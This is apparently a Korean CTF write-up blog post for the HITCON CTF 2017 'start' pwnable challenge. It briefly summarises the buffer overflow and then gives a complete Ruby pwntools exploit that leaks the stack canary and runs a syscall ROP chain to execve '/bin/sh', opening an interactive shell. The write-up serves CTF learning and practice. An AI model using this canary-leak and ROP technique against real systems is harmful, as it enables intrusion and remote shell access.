'syscall rop'에 해당되는 글 1건
- 2017.11.22 [HITCON CTF_2017] start(pwnable)
2017. 11. 22. 00:24
## HITCON CTF_2017(start, pwn)
[Summary]
1. python 모듈인 pwntool과 같은 역할을 하는 ruby모듈 pwntool을 사용하는 문제
=> https://github.com/peter50216/pwntools-ruby
2. server.rb가 실행되는데 eval()함수로 루비 코드를 실행시킨다.
3. start 바이너리는 간단한 bof 취약점이 있고, static compile되어 있다.
=> syscall을 이용한 rop를 하면 된다.
4. canary가 있으므로 0x18바이트만큼 덮어 씌우고 출력하면 canary leak 가능.
[Exploit Code] - start_exploit.rb
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 | # encoding: ASCII-8BIT # The encoding line is important most time, or you'll get "\u0000" when using "\x00" in code, # which is NOT what we want when doing pwn... require 'pwn' context.arch = 'amd64' #context.log_level = :debug z = Sock.new 'localhost', 31337 bss = 0x6cdb80 syscall_gadget = 0x468e75 pop_raxrdxrbx = 0x47a6e6 pop_rsi = 0x4017f7 pop_rdi = 0x4005d5 canary_leak_payload = 'A'*(0x19) # Stage 1 : canary leak z.send canary_leak_payload z.recv 0x18 canary = u64(z.recv 0x8) - 0x41 log.info "[+] canary : #{canary.hex}" # Stage 2 : read(0, bss, 8) & execve(bss, 0x0, 0x0) => bss:"/bin/sh" rop_payload = 'A'*0x18 + p64(canary) + "ebppebpp" rop_payload += p64(pop_rdi) + p64(0x0) + p64(pop_rsi) + p64(bss) rop_payload += p64(pop_raxrdxrbx) + p64(0x0) + p64(0x8) + p64(0x0) rop_payload += p64(syscall_gadget) rop_payload += p64(pop_rdi) + p64(bss) rop_payload += p64(pop_rsi) + p64(0x0) rop_payload += p64(pop_raxrdxrbx) + p64(59) + p64(0x0) + p64(0x0) rop_payload += p64(syscall_gadget) z.send rop_payload z.send "exit" + "\x0a" z.send "/bin/sh"+"\x00" # Switch to interactive mode z.interact | cs |
'CTF writeup' 카테고리의 다른 글
| [34C3 CTF_2017] readme_revenge(pwnable) (0) | 2018.01.22 |
|---|---|
| [34C3 CTF_2017] SimpleGC(pwnable) (0) | 2018.01.07 |
| [CSAW CTF_2017] prophecy(reversing) (0) | 2017.09.21 |
| [HDCON_2017] Fabuary(reversing) (0) | 2017.09.21 |
| [ASIS CTF_2017] mrs. hudson(pwnable) (0) | 2017.09.13 |
